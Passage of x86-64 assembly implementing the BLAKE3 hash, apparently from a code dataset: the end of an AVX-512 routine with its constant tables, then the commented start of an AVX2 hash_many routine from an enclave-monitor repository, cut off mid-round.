vbroadcasti128 ymm2,XMMWORD PTR [BLAKE3_IV+rip]
vpbroadcastd ymm8,r8d
vpblendd ymm3,ymm13,ymm8,0x88
vbroadcasti128 ymm8,XMMWORD PTR [rsi]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x10]
vshufps ymm4,ymm8,ymm9,0x88
vshufps ymm5,ymm8,ymm9,0xdd
vbroadcasti128 ymm8,XMMWORD PTR [rsi+0x20]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x30]
vshufps ymm6,ymm8,ymm9,0x88
vshufps ymm7,ymm8,ymm9,0xdd
vpshufd ymm6,ymm6,0x93
vpshufd ymm7,ymm7,0x93
mov al,0x7
3:
vpaddd ymm0,ymm0,ymm4
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm5
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x93
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x39
vpaddd ymm0,ymm0,ymm6
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm7
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x39
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x93
dec al
je 3f
vshufps ymm8,ymm4,ymm5,0xd6
vpshufd ymm9,ymm4,0xf
vpshufd ymm4,ymm8,0x39
vshufps ymm8,ymm6,ymm7,0xfa
vpblendd ymm9,ymm9,ymm8,0xaa
vpunpcklqdq ymm8,ymm7,ymm5
vpblendd ymm8,ymm8,ymm6,0x88
vpshufd ymm8,ymm8,0x78
vpunpckhdq ymm5,ymm5,ymm7
vpunpckldq ymm6,ymm6,ymm5
vpshufd ymm7,ymm6,0x1e
vmovdqa ymm5,ymm9
vmovdqa ymm6,ymm8
jmp 3b
3:
vpxor ymm0,ymm0,ymm2
vpxor ymm1,ymm1,ymm3
vbroadcasti128 ymm8,XMMWORD PTR [rdi]
vbroadcasti128 ymm9,XMMWORD PTR [rdi+0x10]
vpxor ymm2,ymm2,ymm8
vpxor ymm3,ymm3,ymm9
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vmovdqu xmm0,XMMWORD PTR [rsp+0x8]
vmovdqu xmm1,XMMWORD PTR [rsp+0x48]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x80
sub r10,0x2
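// Tail for the final single block, on plain 128-bit registers.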
2:
test r10,0x1
je 9b
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
vmovd xmm14,DWORD PTR [rsp]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm14,xmm14,edx,0x2
vmovdqa xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vpinsrd xmm3,xmm14,r8d,0x3
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
jmp 9b
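// Read-only constants: lane-index tables, counter increments, the block
// length, and the four BLAKE3 IV words.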
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
INDEX0:
.long 0, 1, 2, 3, 16, 17, 18, 19
.long 8, 9, 10, 11, 24, 25, 26, 27
INDEX1:
.long 4, 5, 6, 7, 20, 21, 22, 23
.long 12, 13, 14, 15, 28, 29, 30, 31
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
.long 8, 9, 10, 11, 12, 13, 14, 15
ADD1: .long 1
ADD16: .long 16
BLAKE3_BLOCK_LEN:
.long 64
.p2align 6
BLAKE3_IV:
BLAKE3_IV_0:
.long 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A
|
mit-enclaves/argos-monitor | 66,050 | C/libraries/sdktyche/loader/blake3_avx2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx2
.global blake3_hash_many_avx2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx2:
blake3_hash_many_avx2:
_CET_ENDBR
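// Prologue: save the callee-saved registers, then carve out a 680-byte
// frame aligned down to 64 bytes for transposed message vectors and spills.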
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 680
and rsp, 0xFFFFFFFFFFFFFFC0
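// Per-lane counters: r9d (presumably a bool telling us whether to
// increment the counter per input) is negated into an all-ones/all-zero
// mask gating the ADD0 = {0..7} and ADD1 offsets added to the low words.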
neg r9d
vmovd xmm0, r9d
vpbroadcastd ymm0, xmm0
vmovdqa ymmword ptr [rsp+0x280], ymm0
vpand ymm1, ymm0, ymmword ptr [ADD0+rip]
vpand ymm2, ymm0, ymmword ptr [ADD1+rip]
vmovdqa ymmword ptr [rsp+0x220], ymm2
vmovd xmm2, r8d
vpbroadcastd ymm2, xmm2
vpaddd ymm2, ymm2, ymm1
vmovdqa ymmword ptr [rsp+0x240], ymm2
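// AVX2 has no unsigned dword compare, so carry out of the low counter
// words is detected by flipping the sign bit of both operands
// (CMP_MSB_MASK) and using signed vpcmpgtd; subtracting the resulting
// all-ones mask adds the carry to the high words.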
vpxor ymm1, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm2, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm1, ymm2
shr r8, 32
vmovd xmm3, r8d
vpbroadcastd ymm3, xmm3
vpsubd ymm3, ymm3, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm3
shl rdx, 6
mov qword ptr [rsp+0x2A0], rdx
cmp rsi, 8
jc 3f
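// Main loop: while 8 or more inputs remain, hash them in parallel,
// one dword lane per input.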
2:
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
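// The eight input pointers.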
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
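// Per-block loop: rdx walks the byte offset; once it reaches the total
// length in [rsp+0x2A0], the end-of-chunk flag byte at [rbp+0x48] is
// merged into the flags via cmove for the final block.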
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x2A0]
cmove eax, ebx
mov dword ptr [rsp+0x200], eax
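// Gather one 64-byte block from each of the eight inputs and transpose
// it into sixteen message row vectors on the stack.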
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x20], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x40], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x60], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x80], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0xA0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0xC0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0xE0], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x100], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x120], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x140], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x160], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x180], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x1A0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x1C0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x1E0], ymm11
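// Broadcast this block's flags into row 15 and prefetch the next block
// from every input.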
vpbroadcastd ymm15, dword ptr [rsp+0x200]
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
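// Round 1 of 7. Rotates by 16/8 use vpshufb with the ROT16/ROT8 tables;
// rotates by 12/7 use shift-and-or. Row vector ymm8 is spilled to
// [rsp+0x200] whenever it is needed as scratch.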
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm0, ymmword ptr [rsp+0x240]
vpxor ymm13, ymm1, ymmword ptr [rsp+0x260]
vpxor ymm14, ymm2, ymmword ptr [BLAKE3_BLOCK_LEN+rip]
vpxor ymm15, ymm3, ymm15
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [BLAKE3_IV_0+rip]
vpaddd ymm9, ymm13, ymmword ptr [BLAKE3_IV_1+rip]
vpaddd ymm10, ymm14, ymmword ptr [BLAKE3_IV_2+rip]
vpaddd ymm11, ymm15, ymmword ptr [BLAKE3_IV_3+rip]
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x100]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xE0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
